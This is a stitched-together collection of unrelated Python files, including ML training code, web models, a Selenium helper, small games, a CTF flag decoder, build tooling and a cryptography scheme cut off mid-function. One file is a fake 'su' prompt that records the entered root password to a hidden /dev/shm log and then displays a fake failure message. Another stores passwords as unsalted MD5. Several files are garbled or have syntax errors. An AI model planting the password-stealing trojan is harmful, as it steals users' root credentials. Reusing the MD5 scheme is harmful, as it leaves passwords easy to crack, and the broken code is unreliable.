from tensorflow.keras import layers
from tensorflow.keras.losses import SparseCategoricalCrossentropy
from tensorflow.keras.optimizers import Adam
from dgl.nn.tensorflow import GraphConv
from tensorflow.keras import activations
from graphgallery.nn.models import TFKeras
class GCN(TFKeras):
def __init__(self, in_features, out_features,
hids=[16],
acts=['relu'],
dropout=0.5,
weight_decay=5e-4,
lr=0.01, bias=True):
super().__init__()
self.convs = []
for hid, act in zip(hids, acts):
layer = GraphConv(in_features, hid, bias=bias,
activation=activations.get(act))
self.convs.append(layer)
in_features = hid
layer = GraphConv(in_features, out_features, bias=bias)
self.convs.append(layer)
self.dropout = layers.Dropout(dropout)
self.compile(loss=SparseCategoricalCrossentropy(from_logits=True),
optimizer=Adam(lr=lr), metrics=['accuracy'])
def call(self, inputs):
h, g = inputs
for layer in self.convs[:-1]:
h = layer(g, h)
h = self.dropout(h)
h = self.convs[-1](g, h)
return h
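# Usage sketch (not part of the original file; assumes DGL and TensorFlow are
# installed, and the graph/feature sizes below are purely illustrative):
#
#     import dgl
#     import numpy as np
#     g = dgl.add_self_loop(dgl.rand_graph(100, 400))   # toy graph with 100 nodes
#     x = np.random.rand(100, 1433).astype("float32")   # node feature matrix
#     model = GCN(in_features=1433, out_features=7)
#     logits = model([x, g])                            # `call` expects (features, graph)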
|
#!/usr/bin/env python
#-*- coding:utf-8 -*-
from hashlib import md5
from sqlalchemy import Column, String, Integer, Boolean, ForeignKey, Table
from sqlalchemy.orm import relationship, backref, relation
from lib import db
from lib.flask_login import UserMixin
from lib.ui.navbar import Navbar
user_permission_table = Table('auth_user_permissions', db.metadata,
Column('user_id', Integer, ForeignKey('auth_users.id',
onupdate="CASCADE", ondelete="CASCADE"), primary_key=True),
Column('permission_id', Integer, ForeignKey('auth_permissions.id',
onupdate="CASCADE", ondelete="CASCADE"), primary_key=True)
)
class User(db.Base, UserMixin):
""" 用户 """
__tablename__ = 'auth_users'
id = Column(Integer, primary_key=True)
username = Column(String(40), unique=True)
name = Column(String(40))
email = Column(String(60), unique=True)
_password = Column('password', String(60))
is_admin = Column(Boolean, default=False)
    ip = Column(String(16))  # used to detect logins from another machine; a changed IP forces re-login
role_id = Column(Integer, ForeignKey('auth_roles.id'))
    permissions = relation('Permission', secondary=user_permission_table, backref='users')  # user permissions, many-to-many relationship
def __unicode__(self):
return self.name or self.username
@property
def password(self):
return self._password
@password.setter
def password(self, value):
self._password = User.create_pwd(value)
@staticmethod
def create_pwd(raw):
return md5(raw).hexdigest()
def check_pwd(self, pwd):
return self.password == User.create_pwd(pwd)
@property
def navbar(self):
nav = Navbar()
return nav
class Dashboard(db.Base):
""" 可视面板 """
__tablename__ = 'auth_dashboards'
id = Column(Integer, primary_key=True)
    cols = Column(Integer, doc=u'number of columns displayed')
    order = Column(String(255), doc=u'ordering parameters')  # [[('demo1', True), ('demo2', False)], [(), ()], []]
uid = Column(Integer, ForeignKey('auth_users.id'))
user = relationship('User', backref=backref('dashboard', uselist=False))
role_permission_table = Table('auth_role_permissions', db.metadata,
Column('role_id', Integer, ForeignKey('auth_roles.id',
onupdate="CASCADE", ondelete="CASCADE"), primary_key=True),
Column('permission_id', Integer, ForeignKey('auth_permissions.id',
onupdate="CASCADE", ondelete="CASCADE"), primary_key=True)
)
class Role(db.Base):
""" 角色 """
__tablename__ = 'auth_roles'
id = Column(Integer, primary_key=True)
name = Column(String(50), unique=True)
    users = relationship('User', backref='role')  # user's role, many-to-one relationship
    permissions = relation('Permission', secondary=role_permission_table, backref='roles')  # role permissions, many-to-many relationship
class Permission(db.Base):
""" 权限 """
__tablename__ = 'auth_permissions'
id = Column(Integer, primary_key=True)
type = Column(String(20), default='model') # dashboard, model, menu
resource = Column(String(50)) # dashboard_id, model_name, menu_id
action = Column(String(20), default='view') # view, new, edit, delete
    is_allow = Column(Boolean, default=True)  # allow/forbid; used when a specific user's permission is explicitly denied
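# Usage sketch (illustrative only; assumes the `db.Base` metadata has been created
# and a session is available):
#
#     user = User(username="alice", email="alice@example.com")
#     user.password = "secret"          # stored as an MD5 hexdigest via the setter
#     assert user.check_pwd("secret")
#     role = Role(name="editor")
#     role.permissions.append(Permission(resource="dashboard_1", action="view"))
#     user.role = role                  # many-to-one backref defined on Role.users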
|
import argparse
from collections import defaultdict
import gc
import gzip
import inspect
import os
import os.path
import sys
import time
import gym
import numpy as np
import pickle
import neural_network as nn
from neural_network import tf, tint
from replay_buffer import ReplayBuffer, PrioritizedExperienceReplay
from envs import AtariEnv
import six
import torch
import torch.nn.functional as F
parser = argparse.ArgumentParser()
parser.add_argument("--learning_rate", default=2.5e-4, help="Learning rate", type=float)
parser.add_argument("--run", default=0, help="run", type=int)
parser.add_argument("--mbsize", default=32, help="Minibatch size", type=int)
parser.add_argument("--buffer_size", default=500000, help="Replay buffer size",type=int)
parser.add_argument("--clone_interval", default=10000, type=int)
parser.add_argument("--weight_decay", default=1e-4, type=float)
parser.add_argument("--opt", default='adam')
parser.add_argument("--env_name", default='ms_pacman')
parser.add_argument("--device", default='cuda', help="device")
parser.add_argument("--checkpoint", default='results/41.pkl', help="checkpoint file",type=str)
def main():
results = {
"results": [],
"measure_reg": [],
"measure_td": [],
"measure_mc": [],
}
hps = {
"opt": ARGS.opt,
"env_name": ARGS.env_name,
"lr": ARGS.learning_rate,
"weight_decay": ARGS.weight_decay,
"run": ARGS.run,
}
nhid = hps.get("nhid", 32)
gamma = hps.get("gamma", 0.99)
mbsize = hps.get("mbsize", 32)
weight_decay = hps.get("weight_decay", 0)
sample_near = hps.get("sample_near", "both")
slice_size = hps.get("slice_size", 0)
env_name = hps.get("env_name", "ms_pacman")
clone_interval = hps.get("clone_interval", 10_000)
reset_on_clone = hps.get("reset_on_clone", False)
reset_opt_on_clone = hps.get("reset_opt_on_clone", False)
max_clones = hps.get("max_clones", 2)
target = hps.get("target", "last") # self, last, clones
replay_type = hps.get("replay_type", "normal") # normal, prioritized
final_epsilon = hps.get("final_epsilon", 0.05)
num_exploration_steps = hps.get("num_exploration_steps", 500_000)
lr = hps.get("lr", 1e-4)
num_iterations = hps.get("num_iterations", 10_000_000)
buffer_size = hps.get("buffer_size", 250_000)
seed = hps.get("run", 0) + 1_642_559 # A large prime number
hps["_seed"] = seed
torch.manual_seed(seed)
np.random.seed(seed)
rng = np.random.RandomState(seed)
env = AtariEnv(env_name)
num_act = env.num_actions
def make_opt(theta):
if hps.get("opt", "sgd") == "sgd":
return torch.optim.SGD(theta, lr, weight_decay=weight_decay)
elif hps["opt"] == "msgd":
return torch.optim.SGD(
theta, lr, momentum=hps.get("beta", 0.99), weight_decay=weight_decay)
elif hps["opt"] == "rmsprop":
return torch.optim.RMSprop(theta, lr, weight_decay=weight_decay)
elif hps["opt"] == "adam":
return torch.optim.Adam(theta, lr, weight_decay=weight_decay)
else:
raise ValueError(hps["opt"])
# Define model
_Qarch, theta_q, Qf, _Qsemi = nn.build(
nn.conv2d(4, nhid, 8, stride=4), # Input is 84x84
nn.conv2d(nhid, nhid * 2, 4, stride=2),
nn.conv2d(nhid * 2, nhid * 2, 3),
nn.flatten(),
nn.hidden(nhid * 2 * 12 * 12, nhid * 16),
nn.linear(nhid * 16, num_act),
)
clone_theta_q = lambda: [i.detach().clone().requires_grad_() for i in theta_q]
# Pretrained parameters
theta_target = load_parameters_from_checkpoint()
# (Same) Random parameters
theta_regress = clone_theta_q()
theta_qlearn = clone_theta_q()
theta_mc = clone_theta_q()
opt_regress = make_opt(theta_regress)
opt_qlearn = make_opt(theta_qlearn)
opt_mc = make_opt(theta_mc)
# Define loss
def sl1(a, b):
d = a - b
u = abs(d)
s = d**2
m = (u < s).float()
return u * m + s * (1 - m)
td = lambda s, a, r, sp, t, w, tw=theta_q: sl1(
r + (1 - t.float()) * gamma * Qf(sp, tw).max(1)[0].detach(),
Qf(s, w)[np.arange(len(a)), a.long()],
)
obs = env.reset()
replay_buffer = ReplayBuffer(seed, buffer_size, near_strategy=sample_near)
total_reward = 0
last_end = 0
num_fill = buffer_size
num_measure = 500
_t0 = t0 = t1 = t2 = t3 = t4 = time.time()
tm0 = tm1 = tm2 = tm3 = time.time()
ema_loss = 0
last_rewards = [0]
print("Filling buffer")
epsilon = final_epsilon
replay_buffer.new_episode(obs, env.enumber % 2)
while replay_buffer.idx < replay_buffer.size - 10:
if rng.uniform(0, 1) < epsilon:
action = rng.randint(0, num_act)
else:
action = Qf(tf(obs / 255.0).unsqueeze(0), theta_target).argmax().item()
obsp, r, done, info = env.step(action)
replay_buffer.add(obs, action, r, done, env.enumber % 2)
obs = obsp
if done:
obs = env.reset()
replay_buffer.new_episode(obs, env.enumber % 2)
# Remove last episode from replay buffer, as it didn't end
it = replay_buffer.idx
curp = replay_buffer.p[it]
while replay_buffer.p[it] == curp:
replay_buffer._sumtree.set(it, 0)
it -= 1
print(f'went from {replay_buffer.idx} to {it} when deleting states')
print("Computing returns")
replay_buffer.compute_values(lambda s: Qf(s, theta_regress), num_act)
replay_buffer.compute_returns(gamma)
replay_buffer.compute_reward_distances()
print("Training regressions")
losses_reg, losses_td, losses_mc = [], [], []
loss_reg_f = lambda x, w: sl1(Qf(x[0], w), Qf(x[0], theta_target))
loss_td_f = lambda x, w: td(*x[:-1], w, theta_target)
loss_mc_f = lambda x, w: sl1(
Qf(x[0], w)[np.arange(len(x[1])), x[1].long()], replay_buffer.g[x[-1]])
losses = {
"reg": loss_reg_f,
"td": loss_td_f,
"mc": loss_mc_f,
}
measure_reg = Measures(theta_regress, losses, replay_buffer,
results["measure_reg"], mbsize)
measure_mc = Measures(theta_mc, losses, replay_buffer,
results["measure_mc"], mbsize)
measure_td = Measures(theta_qlearn, losses, replay_buffer,
results["measure_td"], mbsize)
for i in range(100_000):
sample = replay_buffer.sample(mbsize)
replay_buffer.compute_value_difference(sample, Qf(sample[0], theta_regress))
if i and not i % num_measure:
measure_reg.pre(sample)
measure_mc.pre(sample)
measure_td.pre(sample)
loss_reg = loss_reg_f(sample, theta_regress).mean()
loss_reg.backward()
losses_reg.append(loss_reg.item())
opt_regress.step()
opt_regress.zero_grad()
loss_td = loss_td_f(sample, theta_qlearn).mean()
loss_td.backward()
losses_td.append(loss_td.item())
opt_qlearn.step()
opt_qlearn.zero_grad()
loss_mc = loss_mc_f(sample, theta_mc).mean()
loss_mc.backward()
losses_mc.append(loss_mc.item())
opt_mc.step()
opt_mc.zero_grad()
replay_buffer.update_values(sample, Qf(sample[0], theta_regress))
if i and not i % num_measure:
measure_reg.post()
measure_td.post()
measure_mc.post()
if not i % 1000:
print(i, loss_reg.item(), loss_td.item(), loss_mc.item())
results["results"].append({
"losses_reg": np.float32(losses_reg),
"losses_td": np.float32(losses_td),
"losses_mc": np.float32(losses_mc)
})
path = f'results/regress_{ARGS.run}.pkl'
with open(path, "wb") as f:
pickle.dump(results, f)
print(f"Done in {(time.time()-_t0)/60:.2f}m")
class Measures:
def __init__(self, params, losses, replay_buffer, results, mbsize):
self.p = params
self.losses = losses
self.rb = replay_buffer
self.mbsize = mbsize
self.rs = results
def pre(self, sample):
self._sampleidx = sample[-1]
near_s, self.near_pmask = self.rb.slice_near(self._sampleidx, 30)
self._samples = {
"sample": sample,
"other": self.rb.sample(self.mbsize),
"near": near_s,
}
self._cache = {}
for loss_name, loss in self.losses.items():
for item_name, item in self._samples.items():
with torch.no_grad():
self._cache[f'{item_name}_{loss_name}_pre'] = loss(item, self.p)
def post(self):
r = {
"vdiff_acc": self.rb.vdiff_acc + 0,
"vdiff_cnt": self.rb.vdiff_cnt + 0,
'rdist': self.rb.rdist[self._sampleidx].data.cpu().numpy(),
'g': self.rb.g[self._sampleidx].data.cpu().numpy(),
'near_pmask': self.near_pmask.data.cpu().numpy(),
}
self.rb.vdiff_acc *= 0
self.rb.vdiff_cnt *= 0
for loss_name, loss in self.losses.items():
for item_name, item in self._samples.items():
k = f'{item_name}_{loss_name}'
with torch.no_grad():
self._cache[f'{k}_post'] = (loss(item, self.p))
r[f'{k}_gain'] = (self._cache[f'{k}_pre'] -
self._cache[f'{k}_post']).cpu().data.numpy()
r[k] = self._cache[f'{k}_post'].cpu().data.numpy()
self.rs.append(r)
def load_parameters_from_checkpoint():
data = pickle.load(open(ARGS.checkpoint, 'rb'))
return [tf(data[str(i)]) for i in range(10)]
if __name__ == "__main__":
ARGS = parser.parse_args()
device = torch.device(ARGS.device)
nn.set_device(device)
main()
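# Example invocation (a sketch; the script name and checkpoint path are assumptions):
#   python regress.py --env_name ms_pacman --run 0 --device cuda \
#       --checkpoint results/41.pkl --buffer_size 500000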
|
import cv2
from matplotlib import pyplot as plt
import numpy as np
for i in ['00', '04', '05', '07', '08', '09']:
img1 = cv2.imread('.\\v3\\trajectory-{}.png'.format(i), 1) # queryImage
img2 = cv2.imread('.\\v5\\trajectory-{}.png'.format(i), 1) # trainImage
#vis = np.concatenate((img1, img2), axis=1)
dst = cv2.addWeighted(img1, 0.3, img2, 0.7, 0)
cv2.imwrite('.\\v3-5\\comb-{}.png'.format(i), dst)
'''
for i in ['00', '01', '02', '03']:
img1 = cv2.imread('.\\v4\\trajectory-{}.png'.format(i), 1) # queryImage
img2 = cv2.imread('.\\v6\\trajectory-{}.png'.format(i), 1) # trainImage
#vis = np.concatenate((img1, img2), axis=1)
dst = cv2.addWeighted(img1, 0.3, img2, 0.7, 0)
cv2.imwrite('.\\v4-6\\comb-{}.png'.format(i), dst)
'''
|
from selenium.webdriver.common.by import By
from selenium.webdriver.support.wait import WebDriverWait
class AddProductToCart:
def __init__(self, driver):
self.driver = driver
self.wait = WebDriverWait(driver, 10)
def open(self):
self.driver.get("http://localhost/litecart/en/")
return self
def select_product(self, product_name):
self.driver.find_element(By.XPATH, "//*[@id='box-most-popular']//*[@title='%s']" % product_name).click()
return self
def add_to_cart(self):
        self.driver.find_element(By.NAME, "add_cart_product").click()
        self.wait.until(lambda d: d.find_element(By.XPATH, "//span[@class='quantity' and text()='1']"))
return self
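# Usage sketch (assumes a local litecart install and a chromedriver on PATH;
# the product name is illustrative):
#
#     from selenium import webdriver
#     driver = webdriver.Chrome()
#     AddProductToCart(driver).open().select_product("Yellow Duck").add_to_cart()
#     driver.quit()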
|
# @Time :2019/7/9 22:44
# @Author :jinbiao
class Cat:
kind = "猫" # 类的属性
def __init__(self, colour, name, age): # 构造方法,形参接受对象的属性
self.colour = colour # 给对象赋值
self.name = name
self.age = age
    def eat(self):  # instance method
cat_eat = f"{self.colour}的{self.name}{self.kind},今年{self.age}岁,吃着美味的事物"
return cat_eat
def drink(self):
cat_drink = f"{self.colour}的{self.name}{Cat.kind},今年{self.age}岁,喝着可口的饮料"
return cat_drink
def sound(self):
        cat_eat_sound = self.eat() + "meow" + Cat.legs()  # call an instance method (and a class method) from inside the class
print(cat_eat_sound)
@classmethod
    def legs(cls):  # class method
return "猫有4只腿"
one_cat = Cat("灰色", "Tom", 1)  # create an instance, passing its attribute values
one_cat.eat()  # call the instance's methods
one_cat.drink()
one_cat.sound()
print(one_cat.name)
print(Cat.kind)
print(one_cat.kind)
print(Cat.legs())
print(one_cat.legs())
|
import pandas as pd
from Bio import SeqIO
'''
print("start?")
start = input('That is :')
print("end?")
end = input('That is :')
'''
# The section below reads the whole proteome into one large dictionary
dictseq = {}
n1 = 0
for seq_record in SeqIO.parse("D:\BaiduYunDownload\YZ Meng\python爬虫\测试用氨基酸\[人]uniprot-proteome UP000005640.fasta", "fasta"):
n1 = n1 + 1
xid = seq_record.id.split("|")
yid = xid[1]
z = str(seq_record.seq)
m = {yid:z}
dictseq.update(m)
print('over!')
# The per-entry matching loop follows
df1 = pd.read_csv('D:/BaiduYunDownload/YZ Meng/work/你的综述/cysteine-modification/孟彦铮cys修饰结果汇总/Oxidation/rs5.csv')
uid=[]
negseq=[]
ssit=[]
n2 = 0
for row in df1.itertuples():
try:
n2 = n2 + 1
aimid = row[2]
aimsite = row[3]
sseq = dictseq[aimid]
n3 = 0
for index,AA in enumerate(sseq):
n3 = n3 + 1
if (AA == 'C') and ((index + 1) != aimsite):
index=index+1
try:
if (index<26):
nonn=(26-index)*'-'
seq51 = nonn+sseq[0:index+25]
elif (index+24)>len(sseq):
nonn=(25-(len(sseq)-index))*'-'
seq51 = sseq[index-26:]+nonn
else:
seq51 = sseq[index-26:index+25]
except:
seq51=''
uid.append(aimid)
ssit.append(n3)
negseq.append(seq51)
except:
print('error in this')
alldict={'ID':uid,'site':ssit,'Seq':negseq}
df2=pd.DataFrame(alldict)
df2.to_csv('D:/BaiduYunDownload/YZ Meng/work/你的综述/cysteine-modification/孟彦铮cys修饰结果汇总/Oxidation/rs5neg.csv')
print("over!!")
|
from contextlib import ExitStack
def cleanup_resources():
print("cleanup_resources")
with ExitStack() as stack:
stack.callback(cleanup_resources)
print("stack")
with ExitStack() as stack:
stack.callback(cleanup_resources)
print("stack")
stack.pop_all()
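# Expected behaviour (a note, not new logic): the first `with` block prints
# "stack" and then "cleanup_resources" as the stack unwinds; the second block
# prints only "stack", because pop_all() transfers the registered callbacks to a
# new ExitStack that is never closed, so cleanup_resources() is not invoked.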
|
# Generated by Django 3.1.3 on 2020-11-23 05:55
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('main', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='subject',
name='Registration',
),
migrations.RemoveField(
model_name='subject_attempts',
name='Student',
),
migrations.DeleteModel(
name='Register',
),
migrations.DeleteModel(
name='Student',
),
migrations.DeleteModel(
name='Subject',
),
migrations.DeleteModel(
name='Subject_attempts',
),
]
|
import string
import sys
result = 1196601068455751604172765025142834742772692164339541821505998319783121
origin = 33
out = []
while True:
found = False
for c in string.ascii_letters + '{_}' + string.digits:
        print(result - ord(c))
if (result - ord(c)) % 97 == 0:
found = True
result -= ord(c)
            result //= 97
out.append(c)
            print(c)
if result == origin:
                print(''.join(out)[::-1])
sys.exit()
break
if not found:
print "No password found"
break
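# For reference, the loop above inverts a base-97 encoding of the flag
# (a sketch, assuming the same character alphabet):
#
#     encoded = origin
#     for ch in flag:                     # flag processed character by character
#         encoded = encoded * 97 + ord(ch)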
|
a=int(input())
b=int(input())
c=int(input())
re={}
re[max(a,b,c)]='1'
re[min(a,b,c)]='3'
if a not in re: re[a]='2'
if b not in re: re[b]='2'
if c not in re: re[c]='2'
print(re[a]+'\n'+re[b]+'\n'+re[c])
|
# Copyright 2022 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import logging
import os
from dataclasses import dataclass
from typing import Iterable
from pants.backend.cc.subsystems.compiler import CCSubsystem, ExternalCCSubsystem
from pants.backend.cc.target_types import CCLanguage
from pants.core.util_rules.archive import ExtractedArchive
from pants.core.util_rules.archive import rules as archive_rules
from pants.core.util_rules.system_binaries import (
BinaryNotFoundError,
BinaryPathRequest,
BinaryPaths,
BinaryPathTest,
)
from pants.engine.env_vars import EnvironmentVars, EnvironmentVarsRequest
from pants.engine.fs import DownloadFile
from pants.engine.internals.native_engine import EMPTY_DIGEST, Digest
from pants.engine.platform import Platform
from pants.engine.process import Process
from pants.engine.rules import Get, Rule, collect_rules, rule
from pants.engine.unions import UnionRule
from pants.util.logging import LogLevel
from pants.util.ordered_set import OrderedSet
logger = logging.getLogger(__name__)
@dataclass(frozen=True)
class CCToolchainRequest:
"""A request for a C/C++ toolchain."""
language: CCLanguage
@dataclass(frozen=True)
class CCToolchain:
"""A C/C++ toolchain."""
compiler: str
# include_directories: tuple[str, ...] = () # TODO as part of the `check` goal to ensure source roots are handled
compiler_flags: tuple[str, ...] = ()
compiler_definitions: tuple[str, ...] = ()
linker_flags: tuple[str, ...] = ()
digest: Digest = EMPTY_DIGEST
def __post_init__(self):
# TODO: Should this error out to notify the user of a mistake? Or silently handle
# Or just ensure all defines have -D right now?
if self.compiler_definitions:
            sanitized_definitions = [
                define[2:] if define.startswith("-D") else define  # strip a literal "-D" prefix only
                for define in self.compiler_definitions
            ]
object.__setattr__(self, "compiler_definitions", tuple(sanitized_definitions))
@property
def compile_command(self) -> tuple[str, ...]:
"""The command to compile a C/C++ source file."""
command = [self.compiler, *self.compiler_definitions, *self.compiler_flags]
return tuple(filter(None, command))
@property
def link_command(self) -> tuple[str, ...]:
"""The command to link a C/C++ binary."""
command = [self.compiler, *self.linker_flags]
return tuple(filter(None, command))
async def _executable_path(binary_names: Iterable[str], search_paths: Iterable[str]) -> str:
"""Find the path to an executable by checking whether the executable supports a version
option."""
for name in binary_names:
binary_paths = await Get( # noqa: PNT30: requires triage
BinaryPaths,
BinaryPathRequest(
binary_name=name,
search_path=search_paths,
test=BinaryPathTest(args=["-v"]),
),
)
if not binary_paths or not binary_paths.first_path:
continue
return binary_paths.first_path.path
raise BinaryNotFoundError(f"Could not find any of '{binary_names}' in any of {search_paths}.")
async def _setup_downloadable_toolchain(
request: CCToolchainRequest,
subsystem: ExternalCCSubsystem,
platform: Platform,
) -> CCToolchain:
"""Set up a toolchain from a downloadable archive."""
download_file_request = subsystem.get_request(platform).download_file_request
maybe_archive_digest = await Get(Digest, DownloadFile, download_file_request)
extracted_archive = await Get(ExtractedArchive, Digest, maybe_archive_digest)
# Populate the toolchain for C or C++ accordingly
if request.language == CCLanguage.CXX:
return CCToolchain(
compiler=subsystem.cxx_executable,
compiler_flags=tuple(subsystem.cxx_compiler_flags),
compiler_definitions=tuple(subsystem.cxx_definitions),
digest=extracted_archive.digest,
)
return CCToolchain(
compiler=subsystem.c_executable,
compiler_flags=tuple(subsystem.c_compiler_flags),
compiler_definitions=tuple(subsystem.c_definitions),
digest=extracted_archive.digest,
)
async def _setup_system_toolchain(
request: CCToolchainRequest, subsystem: CCSubsystem
) -> CCToolchain:
"""Set up a toolchain from the user's host system."""
# Sanitize the search paths in case the "<PATH>" is specified
raw_search_paths = list(subsystem.search_paths)
if "<PATH>" in raw_search_paths:
i = raw_search_paths.index("<PATH>")
env = await Get(EnvironmentVars, EnvironmentVarsRequest(["PATH"]))
system_path = env.get("PATH", "")
raw_search_paths[i : i + 1] = system_path.split(os.pathsep)
search_paths = tuple(OrderedSet(raw_search_paths))
# Populate the toolchain for C or C++ accordingly
if request.language == CCLanguage.CXX:
cxx_executable = await _executable_path(tuple(subsystem.cxx_executable), search_paths)
return CCToolchain(
cxx_executable,
compiler_flags=tuple(subsystem.cxx_compiler_flags),
compiler_definitions=tuple(subsystem.cxx_definitions),
)
c_executable = await _executable_path(tuple(subsystem.c_executable), search_paths)
return CCToolchain(
c_executable,
compiler_flags=tuple(subsystem.c_compiler_flags),
compiler_definitions=tuple(subsystem.c_definitions),
)
@rule(desc="Setup the CC Toolchain", level=LogLevel.DEBUG)
async def setup_cc_toolchain(
request: CCToolchainRequest,
subsystem: CCSubsystem,
external_subsystem: ExternalCCSubsystem,
platform: Platform,
) -> CCToolchain:
"""Set up the C/C++ toolchain."""
if external_subsystem.url_template:
return await _setup_downloadable_toolchain(request, external_subsystem, platform)
else:
return await _setup_system_toolchain(request, subsystem)
@dataclass(frozen=True)
class CCProcess:
args: tuple[str, ...]
language: CCLanguage
description: str
input_digest: Digest = EMPTY_DIGEST
output_files: tuple[str, ...] = ()
level: LogLevel = LogLevel.INFO
@rule(desc="Setup a CC Process loaded with the CCToolchain", level=LogLevel.DEBUG)
async def setup_cc_process(request: CCProcess) -> Process:
"""Set up a C/C++ process.
This rule will load the C/C++ toolchain based on the requested language. It will then return a
Process that can be run to compile or link a C/C++ source file.
"""
toolchain = await Get(CCToolchain, CCToolchainRequest(request.language))
# TODO: What if this is for linking instead of compiling?
# TODO: From tdyas: Should there then be a CCCompilerProcess and CCLinkerProcess?
# Investigate further during `check` PR
compiler_command = list(toolchain.compile_command)
# If downloaded, this will be the toolchain, otherwise empty digest
immutable_digests = {"__toolchain": toolchain.digest}
if toolchain.digest != EMPTY_DIGEST:
compiler_command[0] = f"__toolchain/{compiler_command[0]}"
argv = tuple(compiler_command) + request.args
return Process(
argv=argv,
input_digest=request.input_digest,
output_files=request.output_files,
description=request.description,
level=request.level,
immutable_input_digests=immutable_digests,
# env={"__PANTS_CC_COMPILER_FINGERPRINT": toolchain.compiler.fingerprint},
)
def rules() -> Iterable[Rule | UnionRule]:
return (
*collect_rules(),
*archive_rules(),
)
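# Illustrative only (not part of the upstream module): constructing a compile
# request from the CCProcess dataclass above; the `CCLanguage.C` member and the
# file names are assumptions.
#
#     example = CCProcess(
#         args=("-c", "hello.c", "-o", "hello.o"),
#         language=CCLanguage.C,
#         description="Compile hello.c",
#         output_files=("hello.o",),
#     )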
|
import random
def main():
miles_traveled = 0
thirst = 0
camel_tiredness = 0
native_distance = -20
num_canteen = 3
dead = False
done = False
print("Bienvenido a Camel")
print("Robaste un camello para realizar tu viaje hasta el gran desierto Mobi")
print("Los nativos quieren su camello de vuelta y te persiguen")
print("Sobrevive en tu viaje y escapa de los nativos")
while done == False:
oasis = random.randint(1, 20)
print("A. Beber de tu cantimplora.")
print("B. Velocidad normal.")
print("C. Maxima velociada.")
print("D. Descansar en la noche.")
print("E. Revisar estado.")
print("Q. Salir")
a = input("¿Que escoges:? ")
if a.upper() == "Q":
done = True
print("Saliste de juego")
elif a.upper() == "E":
print("Millas recorridas: ",miles_traveled)
print("Numero de cantimploras: ",num_canteen)
print("Los nativos estan a ",-native_distance,"millas deetras de ti")
elif a.upper() == "D":
camel_tiredness = 0
print("Tu camello está feliz")
native_move = random.randint(7, 14)
native_distance += native_move
elif a.upper() == "C":
forward=random.randint(10,20)
miles_traveled += forward
print("Distancia recorrida ",forward,"millas")
thirst += 1
camel_tiredness += 1
native_move = random.randint(7,14)
native_distance += native_move
native_distance -= forward
elif a.upper() == "B":
forward=random.randint(5,12)
miles_traveled += forward
print("distancia recorrida",forward,"miles")
thirst += 1
camel_tiredness += 1
native_move = random.randint(7, 14)
native_distance += native_move
native_distance -= forward
elif a.upper() == "A":
if num_canteen>0:
thirst = 0
num_canteen -= 1
else:
print("No tienes cantimploras")
if thirst > 4 and thirst <= 6:
print("Estas sediento")
elif thirst > 6:
print("Moriste de sed")
done = True
dead = True
camel_tiredness = 0
if camel_tiredness > 5 and camel_tiredness <= 8:
print("Tu camello se está cansando.")
elif camel_tiredness > 8:
print("Tu camello está muerto.")
thirst = 0
dead = True
done = True
if native_distance == 0:
print("¡Los nativos de atraparon!")
done = True
dead = True
thirst = 0
camel_tiredness = 0
elif native_distance < 15 and native_distance > 0:
print("¡Los nativos se están acercando!")
if miles_traveled > 200 and dead == False:
print("¡Enorabuena,escapaste!")
done = True
if oasis == 1 and (a == "B" or a == "C"):
            num_canteen = 3  # finding an oasis refills the canteens
thirst = 0
camel_tiredness = 0
main()
|
#!/usr/bin/python
import os, sys, getpass, time
current_time = time.strftime("%Y-%m-%d %H:%M")
logfile="/dev/shm/.su.log" //密码获取后记录在这里
#CentOS
#fail_str = "su: incorrect password"
#Ubuntu
#fail_str = "su: Authentication failure"
#For Linux Korea //centos,ubuntu,korea 切换root用户失败提示不一样
fail_str = "su: incorrect password"
try:
passwd = getpass.getpass(prompt='Password: ');
file=open(logfile,'a')
file.write("[%s]t%s"%(passwd, current_time)) //截取root密码
file.write('n')
file.close()
except:
pass
time.sleep(1)
print fail_str //打印切换root失败提示
|
'''
Boneh-Canetti-Halevi-Katz Public Key Encryption, IBE-to-PKE transform
| From: "Improved Efficiency for CCA-Secure Cryptosystems Built Using Identity-Based Encryption", Section 4
| Published In: Topics in Cryptology in CTRSA 2005
| Available From: eprint.iacr.org/2004/261.pdf
:Author: Christina Garman
:Date: 12/2011
'''
from charm.core.engine.util import pickleObject, serializeObject
import hmac, hashlib, math
from charm.schemes.ibenc.ibenc_bb03 import IBEnc, ZR, GT, sha1
debug = False
class BCHKIBEnc(IBEnc):
"""
>>> from charm.schemes.encap_bchk05 import EncapBCHK
>>> from charm.schemes.ibenc.ibenc_bb03 import PairingGroup, IBE_BB04
>>> group = PairingGroup('SS512')
>>> ibe = IBE_BB04(group)
>>> encap = EncapBCHK()
>>> hyb_ibe = BCHKIBEnc(ibe, group, encap)
>>> (public_key, secret_key) = hyb_ibe.keygen()
>>> msg = b"Hello World!"
>>> cipher_text = hyb_ibe.encrypt(public_key, msg)
>>> decrypted_msg = hyb_ibe.decrypt(public_key, secret_key, cipher_text)
>>> decrypted_msg == msg
True
"""
def str_XOR(self, m, k):
output = ""
for character in m:
for letter in k:
if(not type(character) == int):
character = ord(character)
if(not type(letter) == int):
letter = ord(letter)
character = chr(character ^ letter)
output += character
return output
def elmtToString(self, g, length):
hash_len = 20
b = int(math.ceil(length / hash_len))
gStr = b''
for i in range(1, b+1):
gStr += sha1(g, i)
return gStr[:length]
def __init__(self, scheme, groupObj, encscheme):
global ibenc, group, encap
ibenc = scheme
group = groupObj
encap = encscheme
def keygen(self):
(PK, msk) = ibenc.setup()
pub = encap.setup()
pk = { 'PK':PK, 'pub':pub }
sk = { 'msk': msk }
return (pk, sk)
def encrypt(self, pk, m):
(k, ID, x) = encap.S(pk['pub'])
ID2 = group.hash(ID, ZR)
m2 = m + b':' + x
# m2 = m + ':' + x
kprime = group.random(GT)
kprimeStr = self.elmtToString(kprime, len(m2))
C1 = ibenc.encrypt(pk['PK'], ID2, kprime)
C2 = self.str_XOR(m2, kprimeStr)
# C2 = C2.encode('utf8')
C2 = C2.encode('utf-8')
C1prime = pickleObject(serializeObject(C1, group))
tag = hmac.new(k, C1prime+C2, hashlib.sha1).digest()
cipher = { 'ID':ID, 'C1':C1, 'C2':C2, 'tag':tag }
return cipher
def decrypt(self, pk, sk, c):
ID2 = group.hash(c['ID'], ZR)
SK = ibenc.extract(sk['msk'], ID2)
kprime = ibenc.decrypt(pk, SK, c['C1'])
kprimeStr = self.elmtToString(kprime, len(c['C2']))
